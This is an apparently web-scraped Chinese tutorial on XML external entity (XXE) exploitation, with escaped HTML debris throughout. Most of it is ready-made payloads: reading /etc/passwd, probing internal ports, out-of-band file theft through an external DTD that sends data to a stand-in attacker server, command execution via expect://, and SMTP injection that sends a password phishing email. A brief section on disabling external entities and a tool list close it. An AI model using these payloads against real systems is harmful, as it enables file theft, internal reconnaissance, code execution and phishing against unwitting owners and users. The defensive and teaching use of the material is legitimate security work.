XXE漏洞利用技巧：从XML到远程代码执行<\/h1>

1. XXE漏洞概述<\/h2>
XXE（XML External Entity）即XML外部实体注入漏洞，当应用程序解析用户提供的XML输入时，允许引用外部实体，攻击者通过构造恶意内容可能导致：<\/p>
任意文件读取<\/li>
系统命令执行<\/li>
内网端口探测<\/li>
攻击内网网站<\/li> <\/ul>
2. 基本利用方式<\/h2>

2.1 文件读取示例<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE GVI [
<\/span><\/span><\/span><!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd" ><\/span>]>
<\/span><\/span><catalog><\/span>
<\/span><\/span>  <core<\/span> id=<\/span>"test101"<\/span>><\/span>
<\/span><\/span>    <author><\/span>John, Doe<\/author><\/span>
<\/span><\/span>    <title><\/span>I love XML<\/title><\/span>
<\/span><\/span>    <category><\/span>Computers<\/category><\/span>
<\/span><\/span>    <price><\/span>9.99<\/price><\/span>
<\/span><\/span>    <date><\/span>2018-10-01<\/date><\/span>
<\/span><\/span>    <description><\/span>&xxe;<\/description><\/span>
<\/span><\/span>  <\/core><\/span>
<\/span><\/span><\/catalog><\/span>
<\/span><\/span><\/code><\/pre>此payload会读取服务器上的\/etc\/passwd<\/code>文件内容。<\/p>
3. Blind OOB XXE（带外数据泄露）<\/h2>
当服务器不直接返回响应时，可使用带外技术获取数据。<\/p>
3.1 端口扫描<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE GVI [
<\/span><\/span><\/span><!ENTITY xxe SYSTEM "http:\/\/127.0.0.1:8080" ><\/span>]>
<\/span><\/span><catalog><\/span>
<\/span><\/span>  <core<\/span> id=<\/span>"test101"<\/span>><\/span>
<\/span><\/span>    <author><\/span>John, Doe<\/author><\/span>
<\/span><\/span>    <title><\/span>I love XML<\/title><\/span>
<\/span><\/span>    <category><\/span>Computers<\/category><\/span>
<\/span><\/span>    <price><\/span>9.99<\/price><\/span>
<\/span><\/span>    <date><\/span>2018-10-01<\/date><\/span>
<\/span><\/span>    <description><\/span>&xxe;<\/description><\/span>
<\/span><\/span>  <\/core><\/span>
<\/span><\/span><\/catalog><\/span>
<\/span><\/span><\/code><\/pre>通过响应时间\/长度判断端口是否开放。<\/p>
3.2 通过DTD窃取文件<\/h3>

攻击者服务器上的xxe_file.dtd<\/code>内容：<\/li>
<\/ol>
<!ENTITY<\/span> % file SYSTEM<\/span> "file:\/\/\/etc\/passwd"<\/span>><\/span>
<\/span><\/span><!ENTITY<\/span> % all "<!ENTITY xxe SYSTEM 'http:\/\/ATTACKESERVER.com\/?%file;'>"<\/span>><\/span>
<\/span><\/span>%all;
<\/span><\/span><\/code><\/pre>
发送给目标服务器的XML：<\/li>
<\/ol>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE data SYSTEM "http:\/\/ATTACKERSERVER.com\/xxe_file.dtd"><\/span>
<\/span><\/span><catalog><\/span>
<\/span><\/span>  <core<\/span> id=<\/span>"test101"<\/span>><\/span>
<\/span><\/span>    <author><\/span>John, Doe<\/author><\/span>
<\/span><\/span>    <title><\/span>I love XML<\/title><\/span>
<\/span><\/span>    <category><\/span>Computers<\/category><\/span>
<\/span><\/span>    <price><\/span>9.99<\/price><\/span>
<\/span><\/span>    <date><\/span>2018-10-01<\/date><\/span>
<\/span><\/span>    <description><\/span>&xxe;<\/description><\/span>
<\/span><\/span>  <\/core><\/span>
<\/span><\/span><\/catalog><\/span>
<\/span><\/span><\/code><\/pre>4. 高级利用技巧<\/h2>
4.1 远程代码执行（需PHP expect模块）<\/h3>
<?xml version="1.0"?><\/span>
<\/span><\/span><!DOCTYPE GVI [
<\/span><\/span><\/span>  <!ELEMENT foo ANY ><\/span>
<\/span><\/span>  <!ENTITY xxe SYSTEM "expect:\/\/id" ><\/span>]>
<\/span><\/span><catalog><\/span>
<\/span><\/span>  <core<\/span> id=<\/span>"test101"<\/span>><\/span>
<\/span><\/span>    <author><\/span>John, Doe<\/author><\/span>
<\/span><\/span>    <title><\/span>I love XML<\/title><\/span>
<\/span><\/span>    <category><\/span>Computers<\/category><\/span>
<\/span><\/span>    <price><\/span>9.99<\/price><\/span>
<\/span><\/span>    <date><\/span>2018-10-01<\/date><\/span>
<\/span><\/span>    <description><\/span>&xxe;<\/description><\/span>
<\/span><\/span>  <\/core><\/span>
<\/span><\/span><\/catalog><\/span>
<\/span><\/span><\/code><\/pre>4.2 钓鱼攻击（利用SMTP服务）<\/h3>
构造FTP URI注入SMTP命令：<\/p>
ftp:\/\/a%0D%0AEHLO%20a%0D%0AMAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0ADATA%0D%0AFrom%3A%20support%40VULNERABLESYSTEM.com%0ATo%3A%20victim%40gmail.com%0ASubject%3A%20test%0A%0Atest!%0A%0D%0A.%0D%0AQUIT%0D%0A:a@VULNERABLESYSTEM.com:25
<\/code><\/pre>
实际发送的命令：<\/p>
EHLO a
MAIL FROM: <support@VULNERABLESYSTEM.com>
RCPT TO: <victim@gmail.com>
DATA
From: support@VULNERABLESYSTEM.com
To: victim@gmail.com
Subject: Reset your password
We need to confirm your identity. Confirm your password here: http:\/\/PHISHING_URL.com.
QUIT
<\/code><\/pre>
5. 防御措施<\/h2>


禁用外部实体<\/strong>：<\/p>

PHP：libxml_disable_entity_loader(true);<\/code><\/li>
Java：设置DocumentBuilderFactory<\/code>的setExpandEntityReferences(false)<\/code><\/li>
<\/ul>
<\/li>

配置XML处理器使用本地静态DTD，禁止XML中含有任何自己声明的DTD<\/p>
<\/li>

对XML输入进行严格过滤和验证<\/p>
<\/li>
<\/ol>
6. 实用工具<\/h2>


BurpSuite<\/strong>：<\/p>

检测潜在XXE漏洞<\/li>
Intruder功能用于端口探测<\/li>
<\/ul>
<\/li>

HTTP请求分析工具<\/strong>：<\/p>

RequestBin<\/li>
HookBin<\/li>
BurpSuite Pro的Collaborator<\/li>
<\/ul>
<\/li>

XXE Cheatsheet<\/strong>：<\/p>

PayloadsAllTheThings\/XXE injections<\/a><\/li>
XXE Cheatsheet<\/a><\/li>
<\/ul>
<\/li>
<\/ol>